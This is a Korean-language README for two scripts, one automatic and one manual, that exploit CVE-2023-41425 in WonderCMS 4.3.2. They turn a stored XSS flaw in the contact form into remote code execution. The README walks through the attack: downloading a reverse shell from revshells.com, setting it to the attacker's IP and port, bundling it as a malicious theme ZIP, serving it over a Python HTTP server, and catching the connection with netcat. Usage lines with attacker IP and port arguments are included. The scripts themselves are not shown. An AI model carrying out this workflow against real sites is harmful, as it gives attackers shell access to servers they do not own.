
WonderCMS 4.3.2 XSS to RCE 익스플로잇
개요
이 스크립트들은 WonderCMS 4.3.2의 XSS(사이트 간 스크립팅) 취약점을 이용하여 **원격 코드 실행(RCE)**을 달성합니다. XSS 페이로드는 관리자가 트리거하면 악의적으로 제작된 테마 모듈을 활용하여 대상 서버에 자동으로 리버스 셸을 설치합니다. 리버스 셸은 revshells.com에서 가져와 실행되며, 공격자에게 서버에 대한 원격 액세스를 부여합니다.
목차
전제 조건
두 스크립트 중 하나를 성공적으로 실행하려면 다음 도구와 조건이 필요합니다:
- Bash 셸: 두 스크립트 모두 Bash 셸을 사용하는 Linux 환경용으로 작성되었습니다.
- netcat (nc): 리버스 셸 연결을 수신 대기하는 데 사용됩니다.
- Python3: 간단한 Python HTTP 서버가 XSS 페이로드를 호스팅하는 데 사용됩니다.
- WonderCMS 4.3.2: 대상이 취약한 버전의 WonderCMS를 실행 중이어야 합니다.
- 관리자 상호 작용: 페이로드가 XSS를 트리거하려면 관리자가 필요하며, 이를 통해 리버스 셸이 실행됩니다.
- revshells.com: 리버스 셸 페이로드는 revshells.com에서 동적으로 다운로드됩니다.
스크립트 1: 자동 익스플로잇
POC
Pasted image 20241010021603
기능
이 버전의 익스플로잇은 활성 nc 리스너를 자동으로 확인하고, 리버스 셸을 다운로드하고, HTTP 서버를 시작하고, 페이로드를 전송한 다음 관리자가 리버스 셸을 트리거할 때까지 기다립니다.
- 자동 리버스 셸 설정: revshells.com에서 미리 생성된 리버스 셸을 다운로드합니다.
- XSS 페이로드 주입: 대상의 문의 양식에 XSS 페이로드를 주입합니다.
- HTTP 서버 관리: 리버스 셸 페이로드를 호스팅하기 위해 Python HTTP 서버를 자동으로 시작합니다.
- nc 리스너 확인: 진행 전에 리스너가 실행 중인지 확인합니다.
- 페이로드 자동 전송: 사용자 상호 작용 없이 페이로드를 자동으로 전송합니다.
사용법
nc 리스너가 지정된 포트에서 실행 중인지 확인합니다:
- 다음 명령으로 스크립트를 실행합니다:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
예시:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
작업 흐름
- 리버스 셸 다운로드: 스크립트가
revshells.com에서 리버스 셸을 다운로드합니다.
- 리버스 셸 수정: 리버스 셸 스크립트가 공격자의 IP와 포트로 업데이트됩니다.
- ZIP 페이로드 생성: 리버스 셸이 포함된 ZIP 파일이 생성됩니다.
- XSS 페이로드 제작: 리버스 셸을 설치하는 XSS 페이로드가 생성되어 취약한 문의 양식에 주입됩니다.
- HTTP 서버 자동 시작: 스크립트가 악성 페이로드를 제공하기 위해 Python HTTP 서버를 시작합니다.
- 페이로드 자동 전송: XSS 페이로드가 관리자에게 자동으로 전송됩니다.
스크립트 2: 수동 익스플로잇
POC
Pasted image 20241010013048
웹사이트 필드에 스크립트가 제공하는 익스플로잇을 사용하세요...
Pasted image 20241010013218
기능
이 버전은 사용자가 nc 리스너와 XSS 페이로드 트리거를 수동으로 관리해야 합니다. 자동 프로세스가 바람직하지 않은 시나리오에 더 적합합니다.
- 수동 리버스 셸 설정: 리스너가 실행 중인지 확인하는 것은 사용자의 책임입니다.
- 수동 XSS 트리거: 스크립트는 관리자에게 보낼 악성 링크를 제공하지만, 페이로드는 수동으로 트리거해야 합니다.
- HTTP 서버 관리: XSS 페이로드를 호스팅하기 위해 Python HTTP 서버를 시작합니다.
사용법
nc 리스너가 지정된 포트에서 실행 중인지 확인합니다:
- 다음 명령으로 스크립트를 실행합니다:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
예시:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
작업 흐름
- 리버스 셸 다운로드:
revshells.com에서 리버스 셸을 다운로드합니다.
- 리버스 셸 수정: 리버스 셸을 공격자의 IP와 포트로 업데이트합니다.
- ZIP 페이로드 생성: 리버스 셸이 포함된 ZIP 파일을 생성합니다.
- XSS 페이로드 제작: 리버스 셸을 설치하는 XSS 페이로드를 생성합니다.
- 악성 링크 표시: 트리거를 위해 관리자에게 보내야 하는 링크를 표시합니다.
- HTTP 서버 시작: 페이로드를 호스팅하기 위해 Python HTTP 서버를 시작합니다.
참고 사항
- 관리자 상호 작용: 두 익스플로잇 모두 WonderCMS 관리자가 취약한 페이지를 방문하여 XSS 페이로드를 트리거하는 것에 의존합니다. 트리거되면 공격자의 머신과 리버스 셸이 연결됩니다.
- 방화벽/IDS/IPS: 의심스러운 활동을 차단하거나 경고할 수 있는 방화벽 또는 침입 탐지 시스템(IDS)으로 보호되는 환경에서 이러한 익스플로잇을 실행할 때는 주의하세요.
- 책임 있는 공개: 대상이 취약한 것을 발견하면 항상 윤리적 지침을 따르고 적절한 당사자에게 취약점을 보고하세요.
라이선스